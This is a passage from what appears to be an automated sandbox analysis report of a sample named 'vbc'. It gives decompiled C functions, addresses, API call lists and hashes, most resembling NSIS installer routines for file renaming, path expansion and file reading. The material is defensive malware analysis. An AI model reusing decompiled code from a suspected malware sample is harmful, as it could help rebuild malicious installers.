                                                									_t48 =  *(_t53 + 0x18);
                                                									goto L17;
                                                								}
                                                								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                								_t42 = _t42 + 0xa;
                                                								goto L16;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					CloseHandle(E0040602D(_t44, 0, 1));
                                                					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
                                                					if(_t12 != 0 && _t12 <= 0x400) {
                                                						goto L3;
                                                					}
                                                				}
                                                				return _t12;
                                                			}



















                                                0x00406183
                                                0x0040618c
                                                0x00406193
                                                0x0040619d
                                                0x004061b1
                                                0x004061d9
                                                0x004061e4
                                                0x004061e8
                                                0x00406208
                                                0x0040620f
                                                0x00406219
                                                0x00406226
                                                0x0040622b
                                                0x00406230
                                                0x00406234
                                                0x00406243
                                                0x00406245
                                                0x00406252
                                                0x00406256
                                                0x004062f1
                                                0x00000000
                                                0x0040626c
                                                0x00406279
                                                0x0040629d
                                                0x004062a1
                                                0x004062c0
                                                0x004062c4
                                                0x004062c4
                                                0x004062c6
                                                0x004062cf
                                                0x004062da
                                                0x004062e5
                                                0x004062eb
                                                0x00000000
                                                0x004062eb
                                                0x004062a3
                                                0x004062a6
                                                0x004062b1
                                                0x004062ad
                                                0x004062af
                                                0x004062b0
                                                0x004062b0
                                                0x004062b8
                                                0x004062ba
                                                0x00000000
                                                0x004062ba
                                                0x00406284
                                                0x0040628a
                                                0x00000000
                                                0x0040628a
                                                0x00406256
                                                0x00406234
                                                0x004061b3
                                                0x004061be
                                                0x004061c7
                                                0x004061cb
                                                0x00000000
                                                0x00000000
                                                0x004061cb
                                                0x004062fc

                                                APIs
                                                • CloseHandle.KERNEL32(00000000), ref: 004061BE
                                                • GetShortPathNameW.KERNEL32 ref: 004061C7
                                                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                • GetShortPathNameW.KERNEL32 ref: 004061E4
                                                • wsprintfA.USER32 ref: 00406202
                                                • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                                • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                                • GlobalFree.KERNEL32(00000000), ref: 004062EB
                                                • CloseHandle.KERNEL32(00000000), ref: 004062F2
                                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                  • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406053
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                • String ID: %ls=%ls$[Rename]
                                                • API String ID: 2171350718-461813615
                                                • Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                                • Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                				struct _ITEMIDLIST* _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _t44;
                                                				WCHAR* _t45;
                                                				signed char _t47;
                                                				signed int _t48;
                                                				short _t59;
                                                				short _t61;
                                                				short _t63;
                                                				void* _t71;
                                                				signed int _t77;
                                                				signed int _t78;
                                                				short _t81;
                                                				short _t82;
                                                				signed char _t84;
                                                				signed int _t85;
                                                				void* _t98;
                                                				void* _t104;
                                                				intOrPtr* _t105;
                                                				void* _t107;
                                                				WCHAR* _t108;
                                                				void* _t110;
                                                
                                                				_t107 = __esi;
                                                				_t104 = __edi;
                                                				_t71 = __ebx;
                                                				_t44 = _a8;
                                                				if(_t44 < 0) {
                                                					_t44 =  *( *0x433edc - 4 + _t44 * 4);
                                                				}
                                                				_push(_t71);
                                                				_push(_t107);
                                                				_push(_t104);
                                                				_t105 =  *0x434f38 + _t44 * 2;
                                                				_t45 = 0x432ea0;
                                                				_t108 = 0x432ea0;
                                                				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
                                                					_t108 = _a4;
                                                					_a4 = _a4 & 0x00000000;
                                                				}
                                                				_t81 =  *_t105;
                                                				_a8 = _t81;
                                                				if(_t81 == 0) {
                                                					L43:
                                                					 *_t108 =  *_t108 & 0x00000000;
                                                					if(_a4 == 0) {
                                                						return _t45;
                                                					}
                                                					return E0040653D(_a4, _t45);
                                                				} else {
                                                					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                						_t98 = 2;
                                                						_t105 = _t105 + _t98;
                                                						if(_t81 >= 4) {
                                                							if(__eflags != 0) {
                                                								 *_t108 = _t81;
                                                								_t108 = _t108 + _t98;
                                                								__eflags = _t108;
                                                							} else {
                                                								 *_t108 =  *_t105;
                                                								_t108 = _t108 + _t98;
                                                								_t105 = _t105 + _t98;
                                                							}
                                                							L42:
                                                							_t82 =  *_t105;
                                                							_a8 = _t82;
                                                							if(_t82 != 0) {
                                                								_t81 = _a8;
                                                								continue;
                                                							}
                                                							goto L43;
                                                						}
                                                						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                						_t47 =  *_t105;
                                                						_t48 = _t47 & 0x000000ff;
                                                						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                						_t85 = _t84 & 0x000000ff;
                                                						_v28 = _t48 | 0x00008000;
                                                						_t77 = 2;
                                                						_v16 = _t85;
                                                						_t105 = _t105 + _t77;
                                                						_v24 = _t48;
                                                						_v20 = _t85 | 0x00008000;
                                                						if(_a8 != _t77) {
                                                							__eflags = _a8 - 3;
                                                							if(_a8 != 3) {
                                                								__eflags = _a8 - 1;
                                                								if(__eflags == 0) {
                                                									__eflags = (_t48 | 0xffffffff) - _v12;
                                                									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                								}
                                                								L38:
                                                								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                								_t45 = 0x432ea0;
                                                								goto L42;
                                                							}
                                                							_t78 = _v12;
                                                							__eflags = _t78 - 0x1d;
                                                							if(_t78 != 0x1d) {
                                                								__eflags = (_t78 << 0xb) + 0x436000;
                                                								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
                                                							} else {
                                                								E00406484(_t108,  *0x434f08);
                                                							}
                                                							__eflags = _t78 + 0xffffffeb - 7;
                                                							if(__eflags < 0) {
                                                								L29:
                                                								E004067C4(_t108);
                                                							}
                                                							goto L38;
                                                						}
                                                						if( *0x434f84 != 0) {
                                                							_t77 = 4;
                                                						}
                                                						_t121 = _t48;
                                                						if(_t48 >= 0) {
                                                							__eflags = _t48 - 0x25;
                                                							if(_t48 != 0x25) {
                                                								__eflags = _t48 - 0x24;
                                                								if(_t48 == 0x24) {
                                                									GetWindowsDirectoryW(_t108, 0x400);
                                                									_t77 = 0;
                                                								}
                                                								while(1) {
                                                									__eflags = _t77;
                                                									if(_t77 == 0) {
                                                										goto L26;
                                                									}
                                                									_t59 =  *0x434f04;
                                                									_t77 = _t77 - 1;
                                                									__eflags = _t59;
                                                									if(_t59 == 0) {
                                                										L22:
                                                										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                										__eflags = _t61;
                                                										if(_t61 != 0) {
                                                											L24:
                                                											 *_t108 =  *_t108 & 0x00000000;
                                                											__eflags =  *_t108;
                                                											continue;
                                                										}
                                                										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                										_a8 = _t61;
                                                										__imp__CoTaskMemFree(_v8);
                                                										__eflags = _a8;
                                                										if(_a8 != 0) {
                                                											goto L26;
                                                										}
                                                										goto L24;
                                                									}
                                                									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                                									__eflags = _t63;
                                                									if(_t63 == 0) {
                                                										goto L26;
                                                									}
                                                									goto L22;
                                                								}
                                                								goto L26;
                                                							}
                                                							GetSystemDirectoryW(_t108, 0x400);
                                                							goto L26;
                                                						} else {
                                                							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                                							if( *_t108 != 0) {
                                                								L27:
                                                								if(_v16 == 0x1a) {
                                                									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                								}
                                                								goto L29;
                                                							}
                                                							E0040657A(_t77, _t105, _t108, _t108, _v16);
                                                							L26:
                                                							if( *_t108 == 0) {
                                                								goto L29;
                                                							}
                                                							goto L27;
                                                						}
                                                					}
                                                					goto L43;
                                                				}
                                                			}





























                                                0x0040657a
                                                0x0040657a
                                                0x0040657a
                                                0x00406580
                                                0x00406585
                                                0x00406596
                                                0x00406596
                                                0x0040659e
                                                0x0040659f
                                                0x004065a0
                                                0x004065a1
                                                0x004065a4
                                                0x004065ac
                                                0x004065ae
                                                0x004065bf
                                                0x004065c2
                                                0x004065c2
                                                0x004065c6
                                                0x004065cc
                                                0x004065cf
                                                0x004067aa
                                                0x004067aa
                                                0x004067b5
                                                0x004067c1
                                                0x004067c1
                                                0x00000000
                                                0x004065d5
                                                0x004065da
                                                0x004065ef
                                                0x004065f0
                                                0x004065f6
                                                0x00406788
                                                0x00406796
                                                0x00406799
                                                0x00406799
                                                0x0040678a
                                                0x0040678d
                                                0x00406790
                                                0x00406792
                                                0x00406792
                                                0x0040679b
                                                0x0040679b
                                                0x004067a1
                                                0x004067a4
                                                0x004065d7
                                                0x00000000
                                                0x004065d7
                                                0x00000000
                                                0x004067a4
                                                0x004065fc
                                                0x004065ff
                                                0x0040660e
                                                0x00406615
                                                0x00406621
                                                0x00406624
                                                0x00406627
                                                0x00406628
                                                0x0040662d
                                                0x00406633
                                                0x00406636
                                                0x00406639
                                                0x0040672c
                                                0x00406731
                                                0x00406764
                                                0x00406769
                                                0x0040676e
                                                0x00406773
                                                0x00406773
                                                0x00406778
                                                0x0040677e
                                                0x00406781
                                                0x00000000
                                                0x00406781
                                                0x00406733
                                                0x00406736
                                                0x00406739
                                                0x0040674e
                                                0x00406755
                                                0x0040673b
                                                0x00406742
                                                0x00406742
                                                0x0040675d
                                                0x00406760
                                                0x00406724
                                                0x00406725
                                                0x00406725
                                                0x00000000
                                                0x00406760
                                                0x00406646
                                                0x0040664a
                                                0x0040664a
                                                0x0040664b
                                                0x0040664d
                                                0x0040668a
                                                0x0040668d
                                                0x0040669d
                                                0x004066a0
                                                0x004066a8
                                                0x004066ae
                                                0x004066ae
                                                0x00406709
                                                0x00406709
                                                0x0040670b
                                                0x00000000
                                                0x00000000
                                                0x004066b2
                                                0x004066b7
                                                0x004066b8
                                                0x004066ba
                                                0x004066d1
                                                0x004066df
                                                0x004066e5
                                                0x004066e7
                                                0x00406705
                                                0x00406705
                                                0x00406705
                                                0x00000000
                                                0x00406705
                                                0x004066ed
                                                0x004066f6
                                                0x004066f9
                                                0x004066ff
                                                0x00406703
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406703
                                                0x004066cb
                                                0x004066cd
                                                0x004066cf
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004066cf
                                                0x00000000
                                                0x00406709
                                                0x00406695
                                                0x00000000
                                                0x0040664f
                                                0x0040666d
                                                0x00406676
                                                0x00406713
                                                0x00406717
                                                0x0040671f
                                                0x0040671f
                                                0x00000000
                                                0x00406717
                                                0x00406680
                                                0x0040670d
                                                0x00406711
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406711
                                                0x0040664d
                                                0x00000000
                                                0x004065da

                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsb88D0.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsb88D0.tmp\System.dll,00000000,00000000,00425A20,74EC110C), ref: 004066A8
                                                • lstrcatW.KERNEL32 ref: 0040671F
                                                • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsb88D0.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsb88D0.tmp\System.dll,00000000), ref: 00406779
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Directory$SystemWindowslstrcatlstrlen
                                                • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsb88D0.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 4260037668-4227587484
                                                • Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                                • Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                				struct tagLOGBRUSH _v16;
                                                				long _t39;
                                                				long _t41;
                                                				void* _t44;
                                                				signed char _t50;
                                                				long* _t54;
                                                
                                                				if(_a4 + 0xfffffecd > 5) {
                                                					L18:
                                                					return 0;
                                                				}
                                                				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                					goto L18;
                                                				} else {
                                                					_t50 = _t54[5];
                                                					if((_t50 & 0xffffffe0) != 0) {
                                                						goto L18;
                                                					}
                                                					_t39 =  *_t54;
                                                					if((_t50 & 0x00000002) != 0) {
                                                						_t39 = GetSysColor(_t39);
                                                					}
                                                					if((_t54[5] & 0x00000001) != 0) {
                                                						SetTextColor(_a8, _t39);
                                                					}
                                                					SetBkMode(_a8, _t54[4]);
                                                					_t41 = _t54[1];
                                                					_v16.lbColor = _t41;
                                                					if((_t54[5] & 0x00000008) != 0) {
                                                						_t41 = GetSysColor(_t41);
                                                						_v16.lbColor = _t41;
                                                					}
                                                					if((_t54[5] & 0x00000004) != 0) {
                                                						SetBkColor(_a8, _t41);
                                                					}
                                                					if((_t54[5] & 0x00000010) != 0) {
                                                						_v16.lbStyle = _t54[2];
                                                						_t44 = _t54[3];
                                                						if(_t44 != 0) {
                                                							DeleteObject(_t44);
                                                						}
                                                						_t54[3] = CreateBrushIndirect( &_v16);
                                                					}
                                                					return _t54[3];
                                                				}
                                                			}









                                                0x00404512
                                                0x004045c8
                                                0x00000000
                                                0x004045c8
                                                0x00404523
                                                0x00404527
                                                0x00000000
                                                0x00404541
                                                0x00404541
                                                0x0040454a
                                                0x00000000
                                                0x00000000
                                                0x0040454c
                                                0x00404558
                                                0x0040455b
                                                0x0040455b
                                                0x00404561
                                                0x00404567
                                                0x00404567
                                                0x00404573
                                                0x00404579
                                                0x00404580
                                                0x00404583
                                                0x00404586
                                                0x00404588
                                                0x00404588
                                                0x00404590
                                                0x00404596
                                                0x00404596
                                                0x004045a0
                                                0x004045a5
                                                0x004045a8
                                                0x004045ad
                                                0x004045b0
                                                0x004045b0
                                                0x004045c0
                                                0x004045c0
                                                0x00000000
                                                0x004045c3

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                                • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 87%
                                                			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                				intOrPtr _t65;
                                                				intOrPtr _t66;
                                                				intOrPtr _t72;
                                                				void* _t76;
                                                				void* _t79;
                                                
                                                				_t72 = __edx;
                                                				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                				_t65 = 2;
                                                				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                				_t66 = E00402D84(_t65);
                                                				_t79 = _t66 - 1;
                                                				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                				if(_t79 < 0) {
                                                					L36:
                                                					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
                                                				} else {
                                                					__ecx = 0x3ff;
                                                					if(__eax > 0x3ff) {
                                                						 *(__ebp - 0x44) = 0x3ff;
                                                					}
                                                					if( *__edi == __bx) {
                                                						L34:
                                                						__ecx =  *(__ebp - 0xc);
                                                						__eax =  *(__ebp - 8);
                                                						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                						if(_t79 == 0) {
                                                							 *(_t76 - 4) = 1;
                                                						}
                                                						goto L36;
                                                					} else {
                                                						 *(__ebp - 0x38) = __ebx;
                                                						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
                                                						if( *(__ebp - 0x44) > __ebx) {
                                                							do {
                                                								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
                                                										__eax = __ebp - 0x50;
                                                										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                											goto L34;
                                                										} else {
                                                											goto L21;
                                                										}
                                                									} else {
                                                										goto L34;
                                                									}
                                                								} else {
                                                									__eax = __ebp - 0x40;
                                                									_push(__ebx);
                                                									_push(__ebp - 0x40);
                                                									__eax = 2;
                                                									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                                									if(__eax == 0) {
                                                										goto L34;
                                                									} else {
                                                										__ecx =  *(__ebp - 0x40);
                                                										if(__ecx == __ebx) {
                                                											goto L34;
                                                										} else {
                                                											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                											 *(__ebp - 0x4c) = __ecx;
                                                											 *(__ebp - 0x50) = __eax;
                                                											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                												L28:
                                                												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                											} else {
                                                												__ebp - 0x50 = __ebp + 0xa;
                                                												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                													L21:
                                                													__eax =  *(__ebp - 0x50);
                                                												} else {
                                                													__edi =  *(__ebp - 0x4c);
                                                													__edi =  ~( *(__ebp - 0x4c));
                                                													while(1) {
                                                														_t22 = __ebp - 0x40;
                                                														 *_t22 =  *(__ebp - 0x40) - 1;
                                                														__eax = 0xfffd;
                                                														 *(__ebp - 0x50) = 0xfffd;
                                                														if( *_t22 == 0) {
                                                															goto L22;
                                                														}
                                                														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                														__edi = __edi + 1;
                                                														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                                														__eax = __ebp + 0xa;
                                                														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                															continue;
                                                														} else {
                                                															goto L21;
                                                														}
                                                														goto L22;
                                                													}
                                                												}
                                                												L22:
                                                												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                													goto L28;
                                                												} else {
                                                													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                														} else {
                                                															__ecx =  *(__ebp - 0xc);
                                                															__edx =  *(__ebp - 8);
                                                															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                														}
                                                														goto L34;
                                                													} else {
                                                														__ecx =  *(__ebp - 0xc);
                                                														__edx =  *(__ebp - 8);
                                                														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                														 *(__ebp - 0x38) = __eax;
                                                														if(__ax == __bx) {
                                                															goto L34;
                                                														} else {
                                                															goto L26;
                                                														}
                                                													}
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                								goto L37;
                                                								L26:
                                                								__eax =  *(__ebp - 8);
                                                							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                						}
                                                						goto L34;
                                                					}
                                                				}
                                                				L37:
                                                				return 0;
                                                			}








                                                0x004026ec
                                                0x004026ee
                                                0x004026f1
                                                0x004026f3
                                                0x004026f6
                                                0x004026fb
                                                0x004026ff
                                                0x00402702
                                                0x00402705
                                                0x00402c2a
                                                0x00402c2d
                                                0x0040270b
                                                0x0040270b
                                                0x00402712
                                                0x00402714
                                                0x00402714
                                                0x0040271a
                                                0x0040287e
                                                0x0040287e
                                                0x00402881
                                                0x00402886
                                                0x004015b6
                                                0x0040292e
                                                0x0040292e
                                                0x00000000
                                                0x00402720
                                                0x00402721
                                                0x0040272c
                                                0x0040272f
                                                0x0040273b
                                                0x0040273f
                                                0x004027d7
                                                0x004027ef
                                                0x004027ff
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402745
                                                0x00402745
                                                0x00402748
                                                0x00402749
                                                0x0040274c
                                                0x00402751
                                                0x00402758
                                                0x00402760
                                                0x00000000
                                                0x00402766
                                                0x00402766
                                                0x0040276b
                                                0x00000000
                                                0x00402771
                                                0x00402771
                                                0x00402779
                                                0x0040277c
                                                0x0040277f
                                                0x0040283a
                                                0x00402841
                                                0x00402785
                                                0x0040278b
                                                0x00402797
                                                0x00402801
                                                0x00402801
                                                0x00402799
                                                0x00402799
                                                0x0040279c
                                                0x0040279e
                                                0x0040279e
                                                0x0040279e
                                                0x004027a1
                                                0x004027a6
                                                0x004027a9
                                                0x00000000
                                                0x00000000
                                                0x004027ab
                                                0x004027ae
                                                0x004027bc
                                                0x004027c2
                                                0x004027d0
                                                0x00000000
                                                0x004027d2
                                                0x00000000
                                                0x004027d2
                                                0x00000000
                                                0x004027d0
                                                0x0040279e
                                                0x00402804
                                                0x00402807
                                                0x00000000
                                                0x00402809
                                                0x0040280e
                                                0x0040284f
                                                0x00402871
                                                0x00402878
                                                0x0040285d
                                                0x0040285d
                                                0x00402860
                                                0x00402863
                                                0x00402866
                                                0x00402866
                                                0x00000000
                                                0x00402817
                                                0x00402817
                                                0x0040281a
                                                0x0040281d
                                                0x00402823
                                                0x00402827
                                                0x0040282a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040282a
                                                0x0040280e
                                                0x00402807
                                                0x0040277f
                                                0x0040276b
                                                0x00402760
                                                0x00000000
                                                0x0040282c
                                                0x0040282c
                                                0x0040282f
                                                0x00402838
                                                0x00000000
                                                0x0040272f
                                                0x0040271a
                                                0x00402c33
                                                0x00402c39

                                                APIs
                                                • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                  • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                • String ID: 9
